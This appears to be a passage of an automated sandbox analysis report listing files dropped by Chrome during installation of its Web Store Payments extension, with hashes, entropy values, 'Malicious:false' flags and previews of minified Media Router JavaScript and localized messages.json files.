                                                                                                                                                                Preview: 'use strict';var ty=function(a,b,c,d){this.g=a;this.j=b;this.Dd=c;this.l=d};ty.prototype.h=function(){return!!this.Dd};var uy=function(a,b,c){var d=Wk.prototype.h,e=ml.prototype.C;this.j=a;this.g=d;this.h=e;this.m=b;this.l=c};var vy=function(a){K(this,a,0,1,null,null)};r(vy,J);var Kba=function(a,b){Ll(a,b,wy)},Lba=function(a,b){for(;x(b);){var c=a,d=b,e=wy;if(1==d.j&&3==d.m){for(var f=0,g=null;x(d)&&(0!=d.m||0!=d.j);)if(0==d.m&&2==d.j)f=Zk(d);else if(2==d.m&&3==d.j)g=$k(d);else if(4==d.m)break;else z(d);if(1!=d.j||4!=d.m||null==g||0==f)throw Error("Malformed binary bytes for message set");if(d=e[f])e=d.j,f=new e.Dd,d.l.call(f,f,new Wk(g)),Nl(c,e,f)}else z(d)}return a},xy={},wy={};var yy=function(a){K(this,a,0,-1,null,null)};r(yy,J);var Pba=function(a,b){for(;x(b)&&!w(b);)switch(b.j){case 1:var c=new zy;b.h(c,Mba);R(a,1,c);break;case 2:c=new Ay;b.h(c,By);R(a,2,c);break;case 3:c=new Ay;b.h(c,By);R(a,3,c);break;case 4:c=new Cy;b.h(c,Nba);R(a,4,c);break;case 5:c=new Dy;b.h(c,Oba);R(a,5,c);
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_webrtc.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2350
                                                                                                                                                                Entropy (8bit):5.295379939015016
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:oNowvRbtlRW3oSk7t1uEFGVz4eEXMeM2GqxyLO0Q1ddpO:elJb9W3bfEFGjg02NYO/dpO
                                                                                                                                                                MD5:9CE032F9C2FE79EB62746CE0DDE8C5E0
                                                                                                                                                                SHA1:7CBCB07EF6582F42960BFF3D88A6D7C1F4501F59
                                                                                                                                                                SHA-256:FDA1A84D5F216D6ED78055067B1C09D51499B8506AA425FBDE6694B19AF34D06
                                                                                                                                                                SHA-512:12D14435D170712895FB626A28360DFA2BA72737D967A06F6186F650EA8B85E9ADB2AB08CA980C4CB20A8BFB51538595326288C2B142EFED07CBA1DAD7716217
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var LLa={TAB:0,ln:1,jv:2},Y$=function(a){Mb("MediaRouter.WebRtc.Start.Success",a,LLa)};var Z$=function(a,b){Ak.call(this,b);this.G=a;this.l=new qb;this.g=nw(b.id);this.m=new qb;this.D=!1;this.o=null;this.F=!1;this.u=this.C=null;MLa(this);NLa(this);this.g.sendMessage(new Ps("GET_TURN_CREDENTIALS"))};r(Z$,Ak);.Z$.prototype.start=function(a){var b=this;return this.l.promise.then(function(c){if(c.g)return Promise.reject(new Fj("Mirroring already started"));if(b.o)return Promise.reject(new Fj("Session permanently stopped"));b.C=new Bb("MediaRouter.WebRtc.Session.Launch");c.ea.addStream(a);c.start();return b.m.promise})};.Z$.prototype.stop=function(){var a=this;this.m.reject(new Fj("Session stop requested."));this.u&&(this.u.end(),this.u=null);if(this.o)return this.o;this.F=this.D=!1;this.C=null;return this.o=this.l.promise.then(function(b){b.stop()}).then(function(){return a.g.dispose()}).catch(function(b){a.g.dispose();throw b;})};.var MLa=function(a){a.g.onMessage=function(b)
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\7f4122a7-f299-4e97-ac86-0a64ab2e897c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):248531
                                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):796
                                                                                                                                                                Entropy (8bit):4.864931792423268
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                                MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):675
                                                                                                                                                                Entropy (8bit):4.536753193530313
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                                MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):641
                                                                                                                                                                Entropy (8bit):4.698608127109193
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                                                                                                                                MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                                SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                                SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                                SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):624
                                                                                                                                                                Entropy (8bit):4.5289746475384565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                                                                                                                                MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                                SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                                SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                                SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):651
                                                                                                                                                                Entropy (8bit):4.583694000020627
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                                                                                                                                MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                                SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                                SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                                                                                                                                SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):787
                                                                                                                                                                Entropy (8bit):4.973349962793468
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                                                                                                                                MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                                SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                                SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                                SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):593
                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\en_GB\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):593
                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):661
                                                                                                                                                                Entropy (8bit):4.450938335136508
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                                                                                                                                MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                                SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                                SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                                SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\es_419\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):637
                                                                                                                                                                Entropy (8bit):4.47253983486615
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                                                                                                                                MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                                SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                                SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                                SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):595
                                                                                                                                                                Entropy (8bit):4.467205425399467
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                                                                                                                                MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                                SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                                SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                                SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):4.595421267152647
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                                MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):658
                                                                                                                                                                Entropy (8bit):4.5231229502550745
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                                MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):677
                                                                                                                                                                Entropy (8bit):4.552569602149629
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                                MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
